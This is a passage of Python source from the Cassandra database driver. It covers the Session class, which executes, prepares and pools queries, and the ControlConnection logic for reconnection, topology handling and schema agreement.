- :func:`cassandra.query.tuple_factory` - return a result row as a tuple
- :func:`cassandra.query.named_tuple_factory` - return a result row as a named tuple
- :func:`cassandra.query.dict_factory` - return a result row as a dict
- :func:`cassandra.query.ordered_dict_factory` - return a result row as an OrderedDict
"""
default_timeout = 10.0
"""
A default timeout, measured in seconds, for queries executed through
:meth:`.execute()` or :meth:`.execute_async()`. This default may be
overridden with the `timeout` parameter for either of those methods.
Setting this to :const:`None` will cause no timeouts to be set by default.
Please see :meth:`.ResponseFuture.result` for details on the scope and
effect of this timeout.
.. versionadded:: 2.0.0
"""
default_consistency_level = ConsistencyLevel.LOCAL_ONE
"""
The default :class:`~ConsistencyLevel` for operations executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.consistency_level` on individual statements.
.. versionadded:: 1.2.0
.. versionchanged:: 3.0.0
default changed from ONE to LOCAL_ONE
"""
default_serial_consistency_level = None
"""
The default :class:`~ConsistencyLevel` for serial phase of conditional updates executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.serial_consistency_level` on individual statements.
Only valid for ``protocol_version >= 2``.
"""
max_trace_wait = 2.0
"""
The maximum amount of time (in seconds) the driver will wait for trace
details to be populated server-side for a query before giving up.
If the `trace` parameter for :meth:`~.execute()` or :meth:`~.execute_async()`
is :const:`True`, the driver will repeatedly attempt to fetch trace
details for the query (using exponential backoff) until this limit is
hit. If the limit is passed, an error will be logged and the
:attr:`.Statement.trace` will be left as :const:`None`. """
default_fetch_size = 5000
"""
By default, this many rows will be fetched at a time. Setting
this to :const:`None` will disable automatic paging for large query
results. The fetch size can be also specified per-query through
:attr:`.Statement.fetch_size`.
This only takes effect when protocol version 2 or higher is used.
See :attr:`.Cluster.protocol_version` for details.
.. versionadded:: 2.0.0
"""
use_client_timestamp = True
"""
When using protocol version 3 or higher, write timestamps may be supplied
client-side at the protocol level. (Normally they are generated
server-side by the coordinator node.) Note that timestamps specified
within a CQL query will override this timestamp.
.. versionadded:: 2.1.0
"""
encoder = None
"""
A :class:`~cassandra.encoder.Encoder` instance that will be used when
formatting query parameters for non-prepared statements. This is not used
for prepared statements (because prepared statements give the driver more
information about what CQL types are expected, allowing it to accept a
wider range of python types).
The encoder uses a mapping from python types to encoder methods (for
specific CQL types). This mapping can be be modified by users as they see
fit. Methods of :class:`~cassandra.encoder.Encoder` should be used for mapping
values if possible, because they take precautions to avoid injections and
properly sanitize data.
Example::
cluster = Cluster()
session = cluster.connect("mykeyspace")
session.encoder.mapping[tuple] = session.encoder.cql_encode_tuple
session.execute("CREATE TABLE mytable (k int PRIMARY KEY, col tuple<int, ascii>)")
session.execute("INSERT INTO mytable (k, col) VALUES (%s, %s)", [0, (123, 'abc')])
.. versionadded:: 2.1.0
"""
client_protocol_handler = ProtocolHandler
"""
Specifies a protocol handler that will be used for client-initiated requests (i.e. no
internal driver requests). This can be used to override or extend features such as
message or type ser/des.
The default pure python implementation is :class:`cassandra.protocol.ProtocolHandler`.
When compiled with Cython, there are also built-in faster alternatives. See :ref:`faster_deser`
"""
_lock = None
_pools = None
_load_balancer = None
_metrics = None
def __init__(self, cluster, hosts):
self.cluster = cluster
self.hosts = hosts
self._lock = RLock()
self._pools = {}
self._load_balancer = cluster.load_balancing_policy
self._metrics = cluster.metrics
self._protocol_version = self.cluster.protocol_version
self.encoder = Encoder()
# create connection pools in parallel
futures = []
for host in hosts:
future = self.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
futures.append(future)
for future in futures:
future.result()
def execute(self, query, parameters=None, timeout=_NOT_SET, trace=False, custom_payload=None):
"""
Execute the given query and synchronously wait for the response.
If an error is encountered while executing the query, an Exception
will be raised.
`query` may be a query string or an instance of :class:`cassandra.query.Statement`.
`parameters` may be a sequence or dict of parameters to bind. If a
sequence is used, ``%s`` should be used the placeholder for each
argument. If a dict is used, ``%(name)s`` style placeholders must
be used.
`timeout` should specify a floating-point timeout (in seconds) after
which an :exc:`.OperationTimedOut` exception will be raised if the query
has not completed. If not set, the timeout defaults to
:attr:`~.Session.default_timeout`. If set to :const:`None`, there is
no timeout. Please see :meth:`.ResponseFuture.result` for details on
the scope and effect of this timeout.
If `trace` is set to :const:`True`, the query will be sent with tracing enabled.
The trace details can be obtained using the returned :class:`.ResultSet` object.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload. The message payload
will be a union of the two, with the values specified here taking precedence.
"""
return self.execute_async(query, parameters, trace, custom_payload, timeout).result()
def execute_async(self, query, parameters=None, trace=False, custom_payload=None, timeout=_NOT_SET):
"""
Execute the given query and return a :class:`~.ResponseFuture` object
which callbacks may be attached to for asynchronous response
delivery. You may also call :meth:`~.ResponseFuture.result()`
on the :class:`.ResponseFuture` to syncronously block for results at
any time.
If `trace` is set to :const:`True`, you may get the query trace descriptors using
:meth:`.ResponseFuture.get_query_trace()` or :meth:`.ResponseFuture.get_all_query_traces()`
on the future result.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload. The message payload
will be a union of the two, with the values specified here taking precedence.
If the server sends a custom payload in the response message,
the dict can be obtained following :meth:`.ResponseFuture.result` via
:attr:`.ResponseFuture.custom_payload`
Example usage::
>>> session = cluster.connect()
>>> future = session.execute_async("SELECT * FROM mycf")
>>> def log_results(results):
... for row in results:
... log.info("Results: %s", row)
>>> def log_error(exc):
>>> log.error("Operation failed: %s", exc)
>>> future.add_callbacks(log_results, log_error)
Async execution with blocking wait for results::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... results = future.result()
... except Exception:
... log.exception("Operation failed:")
"""
if timeout is _NOT_SET:
timeout = self.default_timeout
future = self._create_response_future(query, parameters, trace, custom_payload, timeout)
future._protocol_handler = self.client_protocol_handler
future.send_request()
return future
def _create_response_future(self, query, parameters, trace, custom_payload, timeout):
""" Returns the ResponseFuture before calling send_request() on it """
prepared_statement = None
if isinstance(query, six.string_types):
query = SimpleStatement(query)
elif isinstance(query, PreparedStatement):
query = query.bind(parameters)
cl = query.consistency_level if query.consistency_level is not None else self.default_consistency_level
serial_cl = query.serial_consistency_level if query.serial_consistency_level is not None else self.default_serial_consistency_level
fetch_size = query.fetch_size
if fetch_size is FETCH_SIZE_UNSET and self._protocol_version >= 2:
fetch_size = self.default_fetch_size
elif self._protocol_version == 1:
fetch_size = None
if self._protocol_version >= 3 and self.use_client_timestamp:
timestamp = int(time.time() * 1e6)
else:
timestamp = None
if isinstance(query, SimpleStatement):
query_string = query.query_string
if parameters:
query_string = bind_params(query_string, parameters, self.encoder)
message = QueryMessage(
query_string, cl, serial_cl,
fetch_size, timestamp=timestamp)
elif isinstance(query, BoundStatement):
message = ExecuteMessage(
query.prepared_statement.query_id, query.values, cl,
serial_cl, fetch_size,
timestamp=timestamp)
prepared_statement = query.prepared_statement
elif isinstance(query, BatchStatement):
if self._protocol_version < 2:
raise UnsupportedOperation(
"BatchStatement execution is only supported with protocol version "
"2 or higher (supported in Cassandra 2.0 and higher). Consider "
"setting Cluster.protocol_version to 2 to support this operation.")
message = BatchMessage(
query.batch_type, query._statements_and_parameters, cl,
serial_cl, timestamp)
message.tracing = trace
message.update_custom_payload(query.custom_payload)
message.update_custom_payload(custom_payload)
return ResponseFuture(
self, message, query, timeout, metrics=self._metrics,
prepared_statement=prepared_statement)
def prepare(self, query, custom_payload=None):
"""
Prepares a query string, returning a :class:`~cassandra.query.PreparedStatement`
instance which can be used as follows::
>>> session = cluster.connect("mykeyspace")
>>> query = "INSERT INTO users (id, name, age) VALUES (?, ?, ?)"
>>> prepared = session.prepare(query)
>>> session.execute(prepared, (user.id, user.name, user.age))
Or you may bind values to the prepared statement ahead of time::
>>> prepared = session.prepare(query)
>>> bound_stmt = prepared.bind((user.id, user.name, user.age))
>>> session.execute(bound_stmt)
Of course, prepared statements may (and should) be reused::
>>> prepared = session.prepare(query)
>>> for user in users:
... bound = prepared.bind((user.id, user.name, user.age))
... session.execute(bound)
**Important**: PreparedStatements should be prepared only once.
Preparing the same query more than once will likely affect performance.
`custom_payload` is a key value map to be passed along with the prepare
message. See :ref:`custom_payload`.
"""
message = PrepareMessage(query=query)
future = ResponseFuture(self, message, query=None, timeout=self.default_timeout)
try:
future.send_request()
query_id, column_metadata, pk_indexes = future.result()
except Exception:
log.exception("Error preparing query:")
raise
prepared_statement = PreparedStatement.from_message(
query_id, column_metadata, pk_indexes, self.cluster.metadata, query, self.keyspace,
self._protocol_version)
prepared_statement.custom_payload = future.custom_payload
self.cluster.add_prepared(query_id, prepared_statement)
if self.cluster.prepare_on_all_hosts:
host = future._current_host
try:
self.prepare_on_all_hosts(prepared_statement.query_string, host)
except Exception:
log.exception("Error preparing query on all hosts:")
return prepared_statement
def prepare_on_all_hosts(self, query, excluded_host):
"""
Prepare the given query on all hosts, excluding ``excluded_host``.
Intended for internal use only.
"""
futures = []
for host in self._pools.keys():
if host != excluded_host and host.is_up:
future = ResponseFuture(self, PrepareMessage(query=query), None, self.default_timeout)
# we don't care about errors preparing against specific hosts,
# since we can always prepare them as needed when the prepared
# statement is used. Just log errors and continue on.
try:
request_id = future._query(host)
except Exception:
log.exception("Error preparing query for host %s:", host)
continue
if request_id is None:
# the error has already been logged by ResponsFuture
log.debug("Failed to prepare query for host %s: %r",
host, future._errors.get(host))
continue
futures.append((host, future))
for host, future in futures:
try:
future.result()
except Exception:
log.exception("Error preparing query for host %s:", host)
def shutdown(self):
"""
Close all connections. ``Session`` instances should not be used
for any purpose after being shutdown.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
for pool in self._pools.values():
pool.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def add_or_renew_pool(self, host, is_host_addition):
"""
For internal use only.
"""
distance = self._load_balancer.distance(host)
if distance == HostDistance.IGNORED:
return None
def run_add_or_renew_pool():
try:
if self._protocol_version >= 3:
new_pool = HostConnection(host, distance, self)
else:
new_pool = HostConnectionPool(host, distance, self)
except AuthenticationFailed as auth_exc:
conn_exc = ConnectionException(str(auth_exc), host=host)
self.cluster.signal_connection_failure(host, conn_exc, is_host_addition)
return False
except Exception as conn_exc:
log.warning("Failed to create connection pool for new host %s:",
host, exc_info=conn_exc)
# the host itself will still be marked down, so we need to pass
# a special flag to make sure the reconnector is created
self.cluster.signal_connection_failure(
host, conn_exc, is_host_addition, expect_host_to_be_down=True)
return False
previous = self._pools.get(host)
self._pools[host] = new_pool
log.debug("Added pool for host %s to session", host)
if previous:
previous.shutdown()
return True
return self.submit(run_add_or_renew_pool)
def remove_pool(self, host):
pool = self._pools.pop(host, None)
if pool:
log.debug("Removed connection pool for %r", host)
return self.submit(pool.shutdown)
else:
return None
def update_created_pools(self):
"""
When the set of live nodes change, the loadbalancer will change its
mind on host distances. It might change it on the node that came/left
but also on other nodes (for instance, if a node dies, another
previously ignored node may be now considered).
This method ensures that all hosts for which a pool should exist
have one, and hosts that shouldn't don't.
For internal use only.
"""
for host in self.cluster.metadata.all_hosts():
distance = self._load_balancer.distance(host)
pool = self._pools.get(host)
if not pool or pool.is_shutdown:
# we don't eagerly set is_up on previously ignored hosts. None is included here
# to allow us to attempt connections to hosts that have gone from ignored to something
# else.
if distance != HostDistance.IGNORED and host.is_up in (True, None):
self.add_or_renew_pool(host, False)
elif distance != pool.host_distance:
# the distance has changed
if distance == HostDistance.IGNORED:
self.remove_pool(host)
else:
pool.host_distance = distance
def on_down(self, host):
"""
Called by the parent Cluster instance when a node is marked down.
Only intended for internal use.
"""
future = self.remove_pool(host)
if future:
future.add_done_callback(lambda f: self.update_created_pools())
def on_remove(self, host):
""" Internal """
self.on_down(host)
def set_keyspace(self, keyspace):
"""
Set the default keyspace for all queries made through this Session.
This operation blocks until complete.
"""
self.execute('USE %s' % (protect_name(keyspace),))
def _set_keyspace_for_all_pools(self, keyspace, callback):
"""
Asynchronously sets the keyspace on all pools. When all
pools have set all of their connections, `callback` will be
called with a dictionary of all errors that occurred, keyed
by the `Host` that they occurred against.
"""
self.keyspace = keyspace
remaining_callbacks = set(self._pools.values())
errors = {}
if not remaining_callbacks:
callback(errors)
return
def pool_finished_setting_keyspace(pool, host_errors):
remaining_callbacks.remove(pool)
if host_errors:
errors[pool.host] = host_errors
if not remaining_callbacks:
callback(host_errors)
for pool in self._pools.values():
pool._set_keyspace_for_all_conns(keyspace, pool_finished_setting_keyspace)
def user_type_registered(self, keyspace, user_type, klass):
"""
Called by the parent Cluster instance when the user registers a new
mapping from a user-defined type to a class. Intended for internal
use only.
"""
try:
ks_meta = self.cluster.metadata.keyspaces[keyspace]
except KeyError:
raise UserTypeDoesNotExist(
'Keyspace %s does not exist or has not been discovered by the driver' % (keyspace,))
try:
type_meta = ks_meta.user_types[user_type]
except KeyError:
raise UserTypeDoesNotExist(
'User type %s does not exist in keyspace %s' % (user_type, keyspace))
field_names = type_meta.field_names
if six.PY2:
# go from unicode to string to avoid decode errors from implicit
# decode when formatting non-ascii values
field_names = [fn.encode('utf-8') for fn in field_names]
def encode(val):
return '{ %s }' % ' , '.join('%s : %s' % (
field_name,
self.encoder.cql_encode_all_types(getattr(val, field_name, None))
) for field_name in field_names)
self.encoder.mapping[klass] = encode
def submit(self, fn, *args, **kwargs):
""" Internal """
if not self.is_shutdown:
return self.cluster.executor.submit(fn, *args, **kwargs)
def get_pool_state(self):
return dict((host, pool.get_state()) for host, pool in self._pools.items())
def get_pools(self):
return self._pools.values()
class UserTypeDoesNotExist(Exception):
"""
An attempt was made to use a user-defined type that does not exist.
.. versionadded:: 2.1.0
"""
pass
class _ControlReconnectionHandler(_ReconnectionHandler):
"""
Internal
"""
def __init__(self, control_connection, *args, **kwargs):
_ReconnectionHandler.__init__(self, *args, **kwargs)
self.control_connection = weakref.proxy(control_connection)
def try_reconnect(self):
return self.control_connection._reconnect_internal()
def on_reconnection(self, connection):
self.control_connection._set_new_connection(connection)
def on_exception(self, exc, next_delay):
# TODO only overridden to add logging, so add logging
if isinstance(exc, AuthenticationFailed):
return False
else:
log.debug("Error trying to reconnect control connection: %r", exc)
return True
def _watch_callback(obj_weakref, method_name, *args, **kwargs):
"""
A callback handler for the ControlConnection that tolerates
weak references.
"""
obj = obj_weakref()
if obj is None:
return
getattr(obj, method_name)(*args, **kwargs)
def _clear_watcher(conn, expiring_weakref):
"""
Called when the ControlConnection object is about to be finalized.
This clears watchers on the underlying Connection object.
"""
try:
conn.control_conn_disposed()
except ReferenceError:
pass
class ControlConnection(object):
"""
Internal
"""
_SELECT_PEERS = "SELECT * FROM system.peers"
_SELECT_PEERS_NO_TOKENS = "SELECT peer, data_center, rack, rpc_address, release_version, schema_version FROM system.peers"
_SELECT_LOCAL = "SELECT * FROM system.local WHERE key='local'"
_SELECT_LOCAL_NO_TOKENS = "SELECT cluster_name, data_center, rack, partitioner, release_version, schema_version FROM system.local WHERE key='local'"
_SELECT_SCHEMA_PEERS = "SELECT peer, rpc_address, schema_version FROM system.peers"
_SELECT_SCHEMA_LOCAL = "SELECT schema_version FROM system.local WHERE key='local'"
_is_shutdown = False
_timeout = None
_protocol_version = None
_schema_event_refresh_window = None
_topology_event_refresh_window = None
_status_event_refresh_window = None
_schema_meta_enabled = True
_token_meta_enabled = True
# for testing purposes
_time = time
def __init__(self, cluster, timeout,
schema_event_refresh_window,
topology_event_refresh_window,
status_event_refresh_window,
schema_meta_enabled=True,
token_meta_enabled=True):
# use a weak reference to allow the Cluster instance to be GC'ed (and
# shutdown) since implementing __del__ disables the cycle detector
self._cluster = weakref.proxy(cluster)
self._connection = None
self._timeout = timeout
self._schema_event_refresh_window = schema_event_refresh_window
self._topology_event_refresh_window = topology_event_refresh_window
self._status_event_refresh_window = status_event_refresh_window
self._schema_meta_enabled = schema_meta_enabled
self._token_meta_enabled = token_meta_enabled
self._lock = RLock()
self._schema_agreement_lock = Lock()
self._reconnection_handler = None
self._reconnection_lock = RLock()
self._event_schedule_times = {}
def connect(self):
if self._is_shutdown:
return
self._protocol_version = self._cluster.protocol_version
self._set_new_connection(self._reconnect_internal())
def _set_new_connection(self, conn):
"""
Replace existing connection (if there is one) and close it.
"""
with self._lock:
old = self._connection
self._connection = conn
if old:
log.debug("[control connection] Closing old connection %r, replacing with %r", old, conn)
old.close()
def _reconnect_internal(self):
"""
Tries to connect to each host in the query plan until one succeeds
or every attempt fails. If successful, a new Connection will be
returned. Otherwise, :exc:`NoHostAvailable` will be raised
with an "errors" arg that is a dict mapping host addresses
to the exception that was raised when an attempt was made to open
a connection to that host.
"""
errors = {}
for host in self._cluster.load_balancing_policy.make_query_plan():
try:
return self._try_connect(host)
except ConnectionException as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
self._cluster.signal_connection_failure(host, exc, is_host_addition=False)
except Exception as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
if self._is_shutdown:
raise DriverException("[control connection] Reconnection in progress during shutdown")
raise NoHostAvailable("Unable to connect to any servers", errors)
def _try_connect(self, host):
"""
Creates a new Connection, registers for pushed events, and refreshes
node/token and schema metadata.
"""
log.debug("[control connection] Opening new connection to %s", host)
while True:
try:
connection = self._cluster.connection_factory(host.address, is_control_connection=True)
if self._is_shutdown:
connection.close()
raise DriverException("Reconnecting during shutdown")
break
except ProtocolVersionUnsupported as e:
self._cluster.protocol_downgrade(host.address, e.startup_version)
log.debug("[control connection] Established new connection %r, "
"registering watchers and refreshing schema and topology",
connection)
# use weak references in both directions
# _clear_watcher will be called when this ControlConnection is about to be finalized
# _watch_callback will get the actual callback from the Connection and relay it to
# this object (after a dereferencing a weakref)
self_weakref = weakref.ref(self, partial(_clear_watcher, weakref.proxy(connection)))
try:
connection.register_watchers({
"TOPOLOGY_CHANGE": partial(_watch_callback, self_weakref, '_handle_topology_change'),
"STATUS_CHANGE": partial(_watch_callback, self_weakref, '_handle_status_change'),
"SCHEMA_CHANGE": partial(_watch_callback, self_weakref, '_handle_schema_change')
}, register_timeout=self._timeout)
sel_peers = self._SELECT_PEERS if self._token_meta_enabled else self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL if self._token_meta_enabled else self._SELECT_LOCAL_NO_TOKENS
peers_query = QueryMessage(query=sel_peers, consistency_level=ConsistencyLevel.ONE)
local_query = QueryMessage(query=sel_local, consistency_level=ConsistencyLevel.ONE)
shared_results = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
self._refresh_node_list_and_token_map(connection, preloaded_results=shared_results)
self._refresh_schema(connection, preloaded_results=shared_results, schema_agreement_wait=-1)
except Exception:
connection.close()
raise
return connection
def reconnect(self):
if self._is_shutdown:
return
self._submit(self._reconnect)
def _reconnect(self):
log.debug("[control connection] Attempting to reconnect")
try:
self._set_new_connection(self._reconnect_internal())
except NoHostAvailable:
# make a retry schedule (which includes backoff)
schedule = self.cluster.reconnection_policy.new_schedule()
with self._reconnection_lock:
# cancel existing reconnection attempts
if self._reconnection_handler:
self._reconnection_handler.cancel()
# when a connection is successfully made, _set_new_connection
# will be called with the new connection and then our
# _reconnection_handler will be cleared out
self._reconnection_handler = _ControlReconnectionHandler(
self, self._cluster.scheduler, schedule,
self._get_and_set_reconnection_handler,
new_handler=None)
self._reconnection_handler.start()
except Exception:
log.debug("[control connection] error reconnecting", exc_info=True)
raise
def _get_and_set_reconnection_handler(self, new_handler):
"""
Called by the _ControlReconnectionHandler when a new connection
is successfully created. Clears out the _reconnection_handler on
this ControlConnection.
"""
with self._reconnection_lock:
old = self._reconnection_handler
self._reconnection_handler = new_handler
return old
def _submit(self, *args, **kwargs):
try:
if not self._cluster.is_shutdown:
return self._cluster.executor.submit(*args, **kwargs)
except ReferenceError:
pass
return None
def shutdown(self):
# stop trying to reconnect (if we are)
with self._reconnection_lock:
if self._reconnection_handler:
self._reconnection_handler.cancel()
with self._lock:
if self._is_shutdown:
return
else:
self._is_shutdown = True
log.debug("Shutting down control connection")
if self._connection:
self._connection.close()
self._connection = None
def refresh_schema(self, force=False, **kwargs):
try:
if self._connection:
return self._refresh_schema(self._connection, force=force, **kwargs)
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing schema", exc_info=True)
self._signal_error()
return False
def _refresh_schema(self, connection, preloaded_results=None, schema_agreement_wait=None, force=False, **kwargs):
if self._cluster.is_shutdown:
return False
agreed = self.wait_for_schema_agreement(connection,
preloaded_results=preloaded_results,
wait_time=schema_agreement_wait)
if not self._schema_meta_enabled and not force:
log.debug("[control connection] Skipping schema refresh because schema metadata is disabled")
return False
if not agreed:
log.debug("Skipping schema refresh due to lack of schema agreement")
return False
self._cluster.metadata.refresh(connection, self._timeout, **kwargs)
return True
def refresh_node_list_and_token_map(self, force_token_rebuild=False):
try:
if self._connection:
self._refresh_node_list_and_token_map(self._connection, force_token_rebuild=force_token_rebuild)
return True
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing node list and token map", exc_info=True)
self._signal_error()
return False
def _refresh_node_list_and_token_map(self, connection, preloaded_results=None,
force_token_rebuild=False):
if preloaded_results:
log.debug("[control connection] Refreshing node list and token map using preloaded results")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
else:
cl = ConsistencyLevel.ONE
if not self._token_meta_enabled:
log.debug("[control connection] Refreshing node list without token map")
sel_peers = self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL_NO_TOKENS
else:
log.debug("[control connection] Refreshing node list and token map")
sel_peers = self._SELECT_PEERS
sel_local = self._SELECT_LOCAL
peers_query = QueryMessage(query=sel_peers, consistency_level=cl)
local_query = QueryMessage(query=sel_local, consistency_level=cl)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
peers_result = dict_factory(*peers_result.results)
partitioner = None
token_map = {}
found_hosts = set()
if local_result.results:
found_hosts.add(connection.host)
local_rows = dict_factory(*(local_result.results))
local_row = local_rows[0]
cluster_name = local_row["cluster_name"]
self._cluster.metadata.cluster_name = cluster_name
partitioner = local_row.get("partitioner")
tokens = local_row.get("tokens")
host = self._cluster.metadata.get_host(connection.host)
if host:
datacenter = local_row.get("data_center")
rack = local_row.get("rack")
self._update_location_info(host, datacenter, rack)
host.listen_address = local_row.get("listen_address")
host.broadcast_address = local_row.get("broadcast_address")
host.release_version = local_row.get("release_version")
host.dse_version = local_row.get("dse_version")
host.dse_workload = local_row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
# Check metadata.partitioner to see if we haven't built anything yet. If
# every node in the cluster was in the contact points, we won't discover
# any new nodes, so we need this additional check. (See PYTHON-90)
should_rebuild_token_map = force_token_rebuild or self._cluster.metadata.partitioner is None
for row in peers_result:
addr = self._rpc_from_peer_row(row)
tokens = row.get("tokens", None)
if 'tokens' in row and not tokens: # it was selected, but empty
log.warning("Excluding host (%s) with no tokens in system.peers table of %s." % (addr, connection.host))
continue
if addr in found_hosts:
log.warning("Found multiple hosts with the same rpc_address (%s). Excluding peer %s", addr, row.get("peer"))
continue
found_hosts.add(addr)
host = self._cluster.metadata.get_host(addr)
datacenter = row.get("data_center")
rack = row.get("rack")
if host is None:
log.debug("[control connection] Found new host to connect to: %s", addr)
host, _ = self._cluster.add_host(addr, datacenter, rack, signal=True, refresh_nodes=False)
should_rebuild_token_map = True
else:
should_rebuild_token_map |= self._update_location_info(host, datacenter, rack)
host.broadcast_address = row.get("peer")
host.release_version = row.get("release_version")
host.dse_version = row.get("dse_version")
host.dse_workload = row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
for old_host in self._cluster.metadata.all_hosts():
if old_host.address != connection.host and old_host.address not in found_hosts:
should_rebuild_token_map = True
if old_host.address not in self._cluster.contact_points:
log.debug("[control connection] Removing host not found in peers metadata: %r", old_host)
self._cluster.remove_host(old_host)
log.debug("[control connection] Finished fetching ring info")
if partitioner and should_rebuild_token_map:
log.debug("[control connection] Rebuilding token map due to topology changes")
self._cluster.metadata.rebuild_token_map(partitioner, token_map)
def _update_location_info(self, host, datacenter, rack):
if host.datacenter == datacenter and host.rack == rack:
return False
# If the dc/rack information changes, we need to update the load balancing policy.
# For that, we remove and re-add the node against the policy. Not the most elegant, and assumes
# that the policy will update correctly, but in practice this should work.
self._cluster.load_balancing_policy.on_down(host)
host.set_location_info(datacenter, rack)
self._cluster.load_balancing_policy.on_up(host)
return True
def _delay_for_event_type(self, event_type, delay_window):
# this serves to order processing correlated events (received within the window)
# the window and randomization still have the desired effect of skew across client instances
next_time = self._event_schedule_times.get(event_type, 0)
now = self._time.time()
if now <= next_time:
this_time = next_time + 0.01
delay = this_time - now
else:
delay = random() * delay_window
this_time = now + delay
self._event_schedule_times[event_type] = this_time
return delay
def _refresh_nodes_if_not_up(self, addr):
"""
Used to mitigate refreshes for nodes that are already known.
Some versions of the server send superfluous NEW_NODE messages in addition to UP events.
"""
host = self._cluster.metadata.get_host(addr)
if not host or not host.is_up:
self.refresh_node_list_and_token_map()
def _handle_topology_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
if change_type == "NEW_NODE" or change_type == "MOVED_NODE":
if self._topology_event_refresh_window >= 0:
delay = self._delay_for_event_type('topology_change', self._topology_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self._refresh_nodes_if_not_up, addr)
elif change_type == "REMOVED_NODE":
host = self._cluster.metadata.get_host(addr)
self._cluster.scheduler.schedule_unique(0, self._cluster.remove_host, host)
def _handle_status_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
host = self._cluster.metadata.get_host(addr)
if change_type == "UP":
delay = self._delay_for_event_type('status_change', self._status_event_refresh_window)
if host is None:
# this is the first time we've seen the node
self._cluster.scheduler.schedule_unique(delay, self.refresh_node_list_and_token_map)
else:
self._cluster.scheduler.schedule_unique(delay, self._cluster.on_up, host)
elif change_type == "DOWN":
# Note that there is a slight risk we can receive the event late and thus
# mark the host down even though we already had reconnected successfully.
# But it is unlikely, and don't have too much consequence since we'll try reconnecting
# right away, so we favor the detection to make the Host.is_up more accurate.
if host is not None:
# this will be run by the scheduler
self._cluster.on_down(host, is_host_addition=False)
def _translate_address(self, addr):
return self._cluster.address_translator.translate(addr)
def _handle_schema_change(self, event):
if self._schema_event_refresh_window < 0:
return
delay = self._delay_for_event_type('schema_change', self._schema_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self.refresh_schema, **event)
def wait_for_schema_agreement(self, connection=None, preloaded_results=None, wait_time=None):
total_timeout = wait_time if wait_time is not None else self._cluster.max_schema_agreement_wait
if total_timeout <= 0:
return True
# Each schema change typically generates two schema refreshes, one
# from the response type and one from the pushed notification. Holding
# a lock is just a simple way to cut down on the number of schema queries
# we'll make.
with self._schema_agreement_lock:
if self._is_shutdown:
return
if not connection:
connection = self._connection
if preloaded_results:
log.debug("[control connection] Attempting to use preloaded results for schema agreement")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Waiting for schema agreement")
start = self._time.time()
elapsed = 0
cl = ConsistencyLevel.ONE
schema_mismatches = None
while elapsed < total_timeout:
peers_query = QueryMessage(query=self._SELECT_SCHEMA_PEERS, consistency_level=cl)
local_query = QueryMessage(query=self._SELECT_SCHEMA_LOCAL, consistency_level=cl)
try:
timeout = min(self._timeout, total_timeout - elapsed)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=timeout)
except OperationTimedOut as timeout:
log.debug("[control connection] Timed out waiting for "
"response during schema agreement check: %s", timeout)
elapsed = self._time.time() - start
continue
except ConnectionShutdown:
if self._is_shutdown:
log.debug("[control connection] Aborting wait for schema match due to shutdown")
return None
else:
raise
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Schemas mismatched, trying again")
self._time.sleep(0.2)
elapsed = self._time.time() - start
log.warning("Node %s is reporting a schema disagreement: %s",
connection.host, schema_mismatches)
return False
def _get_schema_mismatches(self, peers_result, local_result, local_address):
peers_result = dict_factory(*peers_result.results)
versions = defaultdict(set)
if local_result.results:
local_row = dict_factory(*local_result.results)[0]
if local_row.get("schema_version"):
versions[local_row.get("schema_version")].add(local_address)
lbp = self._cluster.load_balancing_policy
for row in peers_result:
schema_ver = row.get('schema_version')
if not schema_ver:
continue
addr = self._rpc_from_peer_row(row)
peer = self._cluster.metadata.get_host(addr)
if peer and peer.is_up and lbp.distance(peer) != HostDistance.IGNORED:
versions[schema_ver].add(addr)
if len(versions) == 1:
log.debug("[control connection] Schemas match")
return None
return dict((version, list(nodes)) for version, nodes in six.iteritems(versions))
def _rpc_from_peer_row(self, row):
addr = row.get("rpc_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
return self._translate_address(addr)
def _signal_error(self):
with self._lock:
if self._is_shutdown:
return
# try just signaling the cluster, as this will trigger a reconnect
# as part of marking the host down
if self._connection and self._connection.is_defunct:
host = self._cluster.metadata.get_host(self._connection.host)
# host may be None if it's already been removed, but that indicates
# that errors have already been reported, so we're fine
if host:
self._cluster.signal_connection_failure(
host, self._connection.last_error, is_host_addition=False)
return
# if the connection is not defunct or the host already left, reconnect
# manually
self.reconnect()
def on_up(self, host):
pass
def on_down(self, host):
conn = self._connection
if conn and conn.host == host.address and \
self._reconnection_handler is None:
log.debug("[control connection] Control connection host (%s) is "
"considered down, starting reconnection", host)
# this will result in a task being submitted to the executor to reconnect
self.reconnect()
def on_add(self, host, refresh_nodes=True):
if refresh_nodes:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def on_remove(self, host):
c = self._connection
if c and c.host == host.address:
